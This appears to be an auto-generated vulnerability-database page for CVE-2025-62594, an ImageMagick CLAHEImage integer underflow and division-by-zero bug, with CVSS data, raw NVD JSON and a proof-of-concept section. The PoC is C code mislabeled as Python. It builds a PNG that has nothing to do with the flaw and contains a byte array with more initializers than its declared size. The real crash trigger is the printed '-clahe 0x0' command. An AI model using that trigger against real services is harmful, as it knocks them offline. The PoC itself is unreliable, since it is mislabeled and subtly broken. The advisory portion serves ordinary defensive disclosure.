Security Vulnerability Report
中文
CVE-2025-62594 CVSS 4.7 MEDIUM

CVE-2025-62594

Published: 2025-10-27 20:15:55
Last Modified: 2025-11-03 19:42:36
Source: [email protected]

Description

ImageMagick is a software suite to create, edit, compose, or convert bitmap images. ImageMagick versions prior to 7.1.2-8 are vulnerable to denial-of-service due to unsigned integer underflow and division-by-zero in the CLAHEImage function. When tile width or height is zero, unsigned underflow occurs in pointer arithmetic, leading to out-of-bounds memory access, and division-by-zero causes immediate crashes. This issue has been patched in version 7.1.2-8.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:* - VULNERABLE
ImageMagick < 7.1.2-8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <stdio.h> #include <stdlib.h> #include <string.h> // PoC for CVE-2025-62594: ImageMagick CLAHEImage Integer Underflow // This creates a minimal image that triggers the vulnerability unsigned char create_poc_image(const char* filename) { // Create a minimal PNG with tile parameters set to trigger the vulnerability // The key is to set CLAHE tile width or height to 0 FILE *fp = fopen(filename, "wb"); if (!fp) return 0; // PNG signature unsigned char png_sig[8] = {0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A}; fwrite(png_sig, 1, 8, fp); // IHDR chunk - minimal 1x1 image unsigned char ihdr[25] = { 0x00, 0x00, 0x00, 0x0D, // Length 0x49, 0x48, 0x44, 0x52, // Type: IHDR 0x00, 0x00, 0x00, 0x01, // Width: 1 0x00, 0x00, 0x00, 0x01, // Height: 1 0x08, // Bit depth: 8 0x02, // Color type: RGB 0x00, // Compression 0x00, // Filter 0x00, // Interlace 0x90, 0x77, 0x53, 0xDE // CRC }; fwrite(ihdr, 1, 25, fp); // IDAT chunk with minimal data unsigned char idat[20] = { 0x00, 0x00, 0x00, 0x09, // Length 0x49, 0x44, 0x41, 0x54, // Type: IDAT 0x08, 0xD7, 0x63, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x1A, 0x15, 0x6B, 0x1F // CRC }; fwrite(idat, 1, 20, fp); // IEND chunk unsigned char iend[12] = { 0x00, 0x00, 0x00, 0x00, 0x49, 0x45, 0x4E, 0x44, 0xAE, 0x42, 0x60, 0x82 }; fwrite(iend, 1, 12, fp); fclose(fp); return 1; } int main() { const char* poc_file = "poc_cve_2025_62594.png"; printf("Creating PoC for CVE-2025-62594\n"); printf("ImageMagick CLAHEImage Integer Underflow/DoS\n\n"); if (create_poc_image(poc_file)) { printf("PoC file created: %s\n", poc_file); printf("\nTo trigger the vulnerability:\n"); printf("1. Process with ImageMagick: convert %s output.png\n", poc_file); printf("2. Or use: magick %s -clahe 0x0 output.png\n", poc_file); printf("\nExpected result: Process crash due to integer underflow/div-by-zero\n"); } else { printf("Failed to create PoC file\n"); return 1; } return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62594", "sourceIdentifier": "[email protected]", "published": "2025-10-27T20:15:54.893", "lastModified": "2025-11-03T19:42:36.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ImageMagick is a software suite to create, edit, compose, or convert bitmap images. ImageMagick versions prior to 7.1.2-8 are vulnerable to denial-of-service due to unsigned integer underflow and division-by-zero in the CLAHEImage function. When tile width or height is zero, unsigned underflow occurs in pointer arithmetic, leading to out-of-bounds memory access, and division-by-zero causes immediate crashes. This issue has been patched in version 7.1.2-8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-191"}, {"lang": "en", "value": "CWE-369"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.2-8", "matchCriteriaId": "4702FF3E-797D-46BE-BD35-6126C6E47797"}]}]}], "references": [{"url": "https://github.com/ImageMagick/ImageMagick/commit/7b47fe369eda90483402fcd3d78fa4167d3bb129", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wpp4-vqfq-v4hp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.